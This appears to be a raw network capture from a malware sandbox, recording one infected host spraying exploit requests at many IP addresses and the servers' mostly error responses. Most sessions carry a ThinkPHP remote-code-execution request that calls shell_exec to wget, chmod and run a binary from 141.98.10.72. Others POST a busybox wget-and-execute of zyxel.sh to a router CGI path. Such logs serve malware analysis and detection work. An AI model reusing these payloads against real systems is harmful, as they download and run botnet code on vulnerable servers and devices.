                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            899192.168.2.235123295.0.213.6980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.713857889 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:58.978884935 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:58 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            900192.168.2.235520495.100.218.4380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.799556017 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:59.152216911 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:29:58 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:58 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 39 66 33 36 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 38 26 23 34 36 3b 61 66 34 31 64 66 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c59f3617&#46;1707899398&#46;af41dfe</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            901192.168.2.235177895.126.76.3280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.979070902 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:59.644838095 CET49INHTTP/1.1 404 Site or Page Not Found
                                                            Feb 14, 2024 09:29:59.659877062 CET747INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 53 65 72 76 65 72 3a 20 65 57
                                                            Data Ascii: Access-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueServer: eWONDate: Wed Feb 14 09:29:58 2024 GMTConnection: closePragma: no-cacheCache-Control: no-cache,max-age=0,must-revalidateContent-Type: text/html<!DOCT


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            902192.168.2.2338966112.17.55.2480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:59.330735922 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:59.750199080 CET458INData Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e
                                                            Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">
                                                            Feb 14, 2024 09:29:59.750256062 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 2830
                                                            Connection: close
                                                            x-ws-request-id: 65cc7a07_PS-000-01R1946_35138-49718
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 30 38 3a 32 39 3a 35 39 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 52 31 39 34 36 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 14 Feb 2024 08:29:59 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PS-000-01R1946<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://141.98.10.72/bins
                                                            Feb 14, 2024 09:29:59.750274897 CET1286INData Raw: 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09
                                                            Data Ascii: /x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65cc7a07_PS-000-01R1946_35138-49718<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class
                                                            Feb 14, 2024 09:29:59.857805014 CET458INData Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e
                                                            Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">
                                                            Feb 14, 2024 09:30:00.065761089 CET458INData Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e
                                                            Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            903192.168.2.234950462.29.79.148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:59.339850903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            904192.168.2.235938494.110.121.778080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:59.556701899 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            905192.168.2.2338972112.17.55.2480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:59.584614992 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:59.998981953 CET1286INData Raw: 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09
                                                            Data Ascii: /x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65cc7a07_PS-000-01R1946_37686-42483<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class
                                                            Feb 14, 2024 09:29:59.999001026 CET458INData Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e
                                                            Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">
                                                            Feb 14, 2024 09:29:59.999017954 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 2830
                                                            Connection: close
                                                            x-ws-request-id: 65cc7a07_PS-000-01R1946_37686-42483
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 30 38 3a 32 39 3a 35 39 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 52 31 39 34 36 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 14 Feb 2024 08:29:59 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PS-000-01R1946<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://141.98.10.72/bins
                                                            Feb 14, 2024 09:30:00.103766918 CET458INData Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e
                                                            Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">
                                                            Feb 14, 2024 09:30:00.311683893 CET458INData Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e
                                                            Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            906192.168.2.234755631.200.34.1258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:59.589024067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


